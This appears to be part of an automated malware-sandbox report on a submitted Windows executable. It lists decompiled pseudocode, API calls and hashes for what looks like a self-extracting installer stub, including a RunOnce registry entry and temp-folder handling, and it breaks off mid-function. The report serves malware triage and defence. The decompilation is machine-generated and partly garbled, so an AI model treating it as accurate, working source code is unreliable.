                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e688931265a5654ff799d7fdc46d462de29c1563c48609909b0a24a4b86c5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631D131640618BBEB209F65DC49FAB77BCFB95700F1221A9F645E21A1CA708C85CF62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                          			E00862BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				intOrPtr _t7;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				struct HINSTANCE__* _t12;
                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                          				signed char _t19;
                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t4 = GetVersion();
                                                                                                                                                                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                          						if(_t21 != 0) {
                                                                                                                                                                                                          							_t17 = _t21;
                                                                                                                                                                                                          							 *0x86a288(0, 1, 0, 0);
                                                                                                                                                                                                          							 *_t21();
                                                                                                                                                                                                          							_t29 = _t24 - _t24;
                                                                                                                                                                                                          							if(_t24 != _t24) {
                                                                                                                                                                                                          								_t17 = 4;
                                                                                                                                                                                                          								asm("int 0x29");
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t20 = _a12;
                                                                                                                                                                                                          				_t18 = _a4;
                                                                                                                                                                                                          				 *0x869124 = 0;
                                                                                                                                                                                                          				if(E00862CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                          					_t9 = E00862F1D(_t18, _t20); // executed
                                                                                                                                                                                                          					_t22 = _t9; // executed
                                                                                                                                                                                                          					E008652B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                          					if(_t22 != 0) {
                                                                                                                                                                                                          						_t32 =  *0x868a3a; // 0x0
                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                          							_t19 =  *0x869a2c; // 0x0
                                                                                                                                                                                                          							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                          								E00861F90(_t19, _t21, _t22);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t6 =  *0x868588; // 0x0
                                                                                                                                                                                                          				if(_t6 != 0) {
                                                                                                                                                                                                          					CloseHandle(_t6);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t7 =  *0x869124; // 0x0
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}


















                                                                                                                                                                                                          0x00862c03
                                                                                                                                                                                                          0x00862c0d
                                                                                                                                                                                                          0x00862c18
                                                                                                                                                                                                          0x00862c20
                                                                                                                                                                                                          0x00862c2e
                                                                                                                                                                                                          0x00862c32
                                                                                                                                                                                                          0x00862c36
                                                                                                                                                                                                          0x00862c3d
                                                                                                                                                                                                          0x00862c43
                                                                                                                                                                                                          0x00862c45
                                                                                                                                                                                                          0x00862c47
                                                                                                                                                                                                          0x00862c49
                                                                                                                                                                                                          0x00862c4e
                                                                                                                                                                                                          0x00862c4e
                                                                                                                                                                                                          0x00862c47
                                                                                                                                                                                                          0x00862c32
                                                                                                                                                                                                          0x00862c20
                                                                                                                                                                                                          0x00862c50
                                                                                                                                                                                                          0x00862c54
                                                                                                                                                                                                          0x00862c57
                                                                                                                                                                                                          0x00862c64
                                                                                                                                                                                                          0x00862c66
                                                                                                                                                                                                          0x00862c6b
                                                                                                                                                                                                          0x00862c6d
                                                                                                                                                                                                          0x00862c74
                                                                                                                                                                                                          0x00862c76
                                                                                                                                                                                                          0x00862c7c
                                                                                                                                                                                                          0x00862c7e
                                                                                                                                                                                                          0x00862c87
                                                                                                                                                                                                          0x00862c89
                                                                                                                                                                                                          0x00862c89
                                                                                                                                                                                                          0x00862c87
                                                                                                                                                                                                          0x00862c7c
                                                                                                                                                                                                          0x00862c74
                                                                                                                                                                                                          0x00862c8e
                                                                                                                                                                                                          0x00862c95
                                                                                                                                                                                                          0x00862c98
                                                                                                                                                                                                          0x00862c98
                                                                                                                                                                                                          0x00862c9e
                                                                                                                                                                                                          0x00862ca7

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C03
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C18
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00862C28
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C98
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                          • API String ID: 62482547-3460614246
                                                                                                                                                                                                          • Opcode ID: 7e7f4d95430bdf2185f1b536f109d2346339bbfc7b3e2f046f9ea4fac139b5c3
                                                                                                                                                                                                          • Instruction ID: e3a1492fa0eaab6bfc616f23b08b79a831d9ccae0b1aaac87a0c42a28867d698
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e7f4d95430bdf2185f1b536f109d2346339bbfc7b3e2f046f9ea4fac139b5c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D114C31200B059BCB206BB8AC99A2F375DFB84384B0B1055F845F7391DE78DC41CA62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00866F40() {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E00866EF0); // executed
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00866f45
                                                                                                                                                                                                          0x00866f4d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00866F45
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                          • Opcode ID: b191f09cacc32c5fae8b0363f72893a3fafe906a1321ea123125afbeb36ed331
                                                                                                                                                                                                          • Instruction ID: fc79ec63ec572cc47eeb60fe566efb5a2c2bd00371c1f15e479d0042eda46e55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b191f09cacc32c5fae8b0363f72893a3fafe906a1321ea123125afbeb36ed331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA9002642511804797141B70DD194157591BA4E602B936460E122D4594EBB590505952
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E0086202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                          				int _v536;
                                                                                                                                                                                                          				int _v540;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				long _t41;
                                                                                                                                                                                                          				struct HINSTANCE__* _t46;
                                                                                                                                                                                                          				intOrPtr _t49;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          				CHAR* _t54;
                                                                                                                                                                                                          				void _t56;
                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                          				intOrPtr* _t72;
                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                          				intOrPtr* _t81;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t79 = __edx;
                                                                                                                                                                                                          				_t28 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                          				_t84 = 0x104;
                                                                                                                                                                                                          				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                          				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                          				_t95 = _t94 + 0x18;
                                                                                                                                                                                                          				_t66 = 0;
                                                                                                                                                                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                          				if(_t36 != 0) {
                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                          					return E00866CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(_t86);
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					E0086171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                          					_t95 = _t95 + 0x10;
                                                                                                                                                                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                          					if(_t41 != 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t87 = _t87 + 1;
                                                                                                                                                                                                          					if(_t87 < 0xc8) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t87 != 0xc8) {
                                                                                                                                                                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                          					_t79 = _t84;
                                                                                                                                                                                                          					E0086658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                          					_t84 = _t46;
                                                                                                                                                                                                          					if(_t84 == 0) {
                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                          						if(GetModuleFileNameA( *0x869a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                          							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                          							_pop(_t86);
                                                                                                                                                                                                          							goto L24;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						_t72 =  &_v268;
                                                                                                                                                                                                          						_t80 = _t72 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t49 =  *_t72;
                                                                                                                                                                                                          							_t72 = _t72 + 1;
                                                                                                                                                                                                          						} while (_t49 != 0);
                                                                                                                                                                                                          						_t73 = _t72 - _t80;
                                                                                                                                                                                                          						_t81 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t50 =  *_t81;
                                                                                                                                                                                                          							_t81 = _t81 + 1;
                                                                                                                                                                                                          						} while (_t50 != 0);
                                                                                                                                                                                                          						_t84 = _t73 + 0x50 + _t81 - 0x8691e5;
                                                                                                                                                                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8691e5);
                                                                                                                                                                                                          						if(_t90 != 0) {
                                                                                                                                                                                                          							 *0x868580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                          							if(_t66 == 0) {
                                                                                                                                                                                                          								_t54 = "%s /D:%s";
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          							E0086171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                          							_t75 = _t90;
                                                                                                                                                                                                          							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                          							_t79 = _t23;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t56 =  *_t75;
                                                                                                                                                                                                          								_t75 = _t75 + 1;
                                                                                                                                                                                                          							} while (_t56 != 0);
                                                                                                                                                                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                          							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                          							RegCloseKey(_v532); // executed
                                                                                                                                                                                                          							_t36 = LocalFree(_t90);
                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t79 = 0x4b5;
                                                                                                                                                                                                          						E008644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                          					FreeLibrary(_t84); // executed
                                                                                                                                                                                                          					if(_t91 == 0) {
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          						E0086658A( &_v268, 0x104, 0x861140);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                          				 *0x868530 = _t66;
                                                                                                                                                                                                          				goto L23;
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x0086202a
                                                                                                                                                                                                          0x00862035
                                                                                                                                                                                                          0x0086203c
                                                                                                                                                                                                          0x00862041
                                                                                                                                                                                                          0x00862050
                                                                                                                                                                                                          0x0086205f
                                                                                                                                                                                                          0x00862064
                                                                                                                                                                                                          0x0086206f
                                                                                                                                                                                                          0x0086208c
                                                                                                                                                                                                          0x00862094
                                                                                                                                                                                                          0x00862257
                                                                                                                                                                                                          0x00862266
                                                                                                                                                                                                          0x00862266
                                                                                                                                                                                                          0x0086209a
                                                                                                                                                                                                          0x0086209b
                                                                                                                                                                                                          0x0086209d
                                                                                                                                                                                                          0x008620aa
                                                                                                                                                                                                          0x008620af
                                                                                                                                                                                                          0x008620c9
                                                                                                                                                                                                          0x008620d1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008620d3
                                                                                                                                                                                                          0x008620da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008620da
                                                                                                                                                                                                          0x008620e2
                                                                                                                                                                                                          0x00862103
                                                                                                                                                                                                          0x0086210e
                                                                                                                                                                                                          0x00862116
                                                                                                                                                                                                          0x00862122
                                                                                                                                                                                                          0x00862128
                                                                                                                                                                                                          0x0086212c
                                                                                                                                                                                                          0x00862179
                                                                                                                                                                                                          0x00862194
                                                                                                                                                                                                          0x008621de
                                                                                                                                                                                                          0x008621e4
                                                                                                                                                                                                          0x00862256
                                                                                                                                                                                                          0x00862256
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862256
                                                                                                                                                                                                          0x00862196
                                                                                                                                                                                                          0x00862196
                                                                                                                                                                                                          0x0086219c
                                                                                                                                                                                                          0x0086219f
                                                                                                                                                                                                          0x0086219f
                                                                                                                                                                                                          0x008621a1
                                                                                                                                                                                                          0x008621a2
                                                                                                                                                                                                          0x008621a6
                                                                                                                                                                                                          0x008621a8
                                                                                                                                                                                                          0x008621b0
                                                                                                                                                                                                          0x008621b0
                                                                                                                                                                                                          0x008621b2
                                                                                                                                                                                                          0x008621b3
                                                                                                                                                                                                          0x008621bc
                                                                                                                                                                                                          0x008621c7
                                                                                                                                                                                                          0x008621cb
                                                                                                                                                                                                          0x008621f1
                                                                                                                                                                                                          0x008621f6
                                                                                                                                                                                                          0x008621fd
                                                                                                                                                                                                          0x008621ff
                                                                                                                                                                                                          0x008621ff
                                                                                                                                                                                                          0x00862204
                                                                                                                                                                                                          0x00862213
                                                                                                                                                                                                          0x00862218
                                                                                                                                                                                                          0x0086221d
                                                                                                                                                                                                          0x0086221d
                                                                                                                                                                                                          0x00862220
                                                                                                                                                                                                          0x00862220
                                                                                                                                                                                                          0x00862222
                                                                                                                                                                                                          0x00862223
                                                                                                                                                                                                          0x00862229
                                                                                                                                                                                                          0x0086223d
                                                                                                                                                                                                          0x00862249
                                                                                                                                                                                                          0x00862250
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862250
                                                                                                                                                                                                          0x008621d2
                                                                                                                                                                                                          0x008621d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008621d9
                                                                                                                                                                                                          0x0086213a
                                                                                                                                                                                                          0x00862141
                                                                                                                                                                                                          0x00862144
                                                                                                                                                                                                          0x0086214c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862163
                                                                                                                                                                                                          0x00862172
                                                                                                                                                                                                          0x00862172
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862163
                                                                                                                                                                                                          0x008620ea
                                                                                                                                                                                                          0x008620f0
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00862050
                                                                                                                                                                                                          • memset.MSVCRT ref: 0086205F
                                                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0086208C
                                                                                                                                                                                                            • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
                                                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008620C9
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008620EA
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00862103
                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862122
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00862134
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862144
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 0086215B
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0086218C
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008621C1
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008621E4
                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0086223D
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862249
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862250
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                          • API String ID: 178549006-3765599613
                                                                                                                                                                                                          • Opcode ID: 7c576992cf84701b01662a56d23b65b4b9db24b33d5f802f2e8cd7cc4dd4831d
                                                                                                                                                                                                          • Instruction ID: c1ccbb6d02372d1561b7acdc0cd0b79dcbfc296107608ab4f8448ec15d464613
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c576992cf84701b01662a56d23b65b4b9db24b33d5f802f2e8cd7cc4dd4831d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B512571A00618EBDB249B64DC4DFEA772CFB51700F0202A4FA59E7291EAB59D488F51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 232 8655a0-8655d9 call 86468f LocalAlloc 235 8655fd-86560c call 86468f 232->235 236 8655db-8655f1 call 8644b9 call 866285 232->236 242 865632-865643 lstrcmpA 235->242 243 86560e-865630 call 8644b9 LocalFree 235->243 250 8655f6-8655f8 236->250 244 865645 242->244 245 86564b-865659 LocalFree 242->245 243->250 244->245 248 865696-86569c 245->248 249 86565b-86565d 245->249 255 8656a2-8656a8 248->255 256 86589f-8658b5 call 866517 248->256 252 86565f-865667 249->252 253 865669 249->253 254 8658b7-8658c7 call 866ce0 250->254 252->253 257 86566b-86567a call 865467 252->257 253->257 255->256 260 8656ae-8656c1 GetTempPathA 255->260 256->254 270 865680-865691 call 8644b9 257->270 271 86589b-86589d 257->271 264 8656f3-865711 call 861781 260->264 265 8656c3-8656c9 call 865467 260->265 275 865717-865729 GetDriveTypeA 264->275 276 86586c-865890 GetWindowsDirectoryA call 86597d 264->276 269 8656ce-8656d0 265->269 269->271 273 8656d6-8656df call 862630 269->273 270->250 271->254 273->264 286 8656e1-8656ed call 865467 273->286 280 865730-865740 GetFileAttributesA 275->280 281 86572b-86572e 275->281 276->264 287 865896 276->287 284 865742-865745 280->284 285 86577e-86578f call 86597d 280->285 281->280 281->284 289 865747-86574f 284->289 290 86576b 284->290 298 8657b2-8657bf call 862630 285->298 299 865791-86579e call 862630 285->299 286->264 286->271 287->271 291 865771-865779 289->291 292 865751-865753 289->292 290->291 296 865864-865866 291->296 292->291 295 865755-865762 call 866952 292->295 295->290 308 865764-865769 295->308 296->275 296->276 306 8657d3-8657f8 call 86658a GetFileAttributesA 298->306 307 8657c1-8657cd GetWindowsDirectoryA 298->307 299->290 309 8657a0-8657b0 call 86597d 299->309 314 86580a 306->314 315 8657fa-865808 CreateDirectoryA 306->315 307->306 308->285 308->290 309->290 309->298 316 86580d-86580f 314->316 315->316 317 865827-86585c SetFileAttributesA call 861781 call 865467 316->317 318 865811-865825 316->318 317->271 323 86585e 317->323 318->296 323->296
                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                          			E008655A0(void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v265;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                          				int _t40;
                                                                                                                                                                                                          				int _t44;
                                                                                                                                                                                                          				long _t48;
                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                          				int _t50;
                                                                                                                                                                                                          				signed int _t53;
                                                                                                                                                                                                          				int _t54;
                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                          				char _t60;
                                                                                                                                                                                                          				int _t65;
                                                                                                                                                                                                          				char _t66;
                                                                                                                                                                                                          				int _t67;
                                                                                                                                                                                                          				int _t68;
                                                                                                                                                                                                          				int _t69;
                                                                                                                                                                                                          				int _t70;
                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                          				CHAR* _t82;
                                                                                                                                                                                                          				CHAR* _t88;
                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t28 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                          				_t2 = E0086468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                          				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                          				if(_t109 != 0) {
                                                                                                                                                                                                          					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                          					_t32 = E0086468F(_t82, _t109, 1);
                                                                                                                                                                                                          					__eflags = _t32;
                                                                                                                                                                                                          					if(_t32 != 0) {
                                                                                                                                                                                                          						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                          						__eflags = _t33;
                                                                                                                                                                                                          						if(_t33 == 0) {
                                                                                                                                                                                                          							 *0x869a30 = 1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						LocalFree(_t109);
                                                                                                                                                                                                          						_t35 =  *0x868b3e; // 0x0
                                                                                                                                                                                                          						__eflags = _t35;
                                                                                                                                                                                                          						if(_t35 == 0) {
                                                                                                                                                                                                          							__eflags =  *0x868a24; // 0x0
                                                                                                                                                                                                          							if(__eflags != 0) {
                                                                                                                                                                                                          								L46:
                                                                                                                                                                                                          								_t101 = 0x7d2;
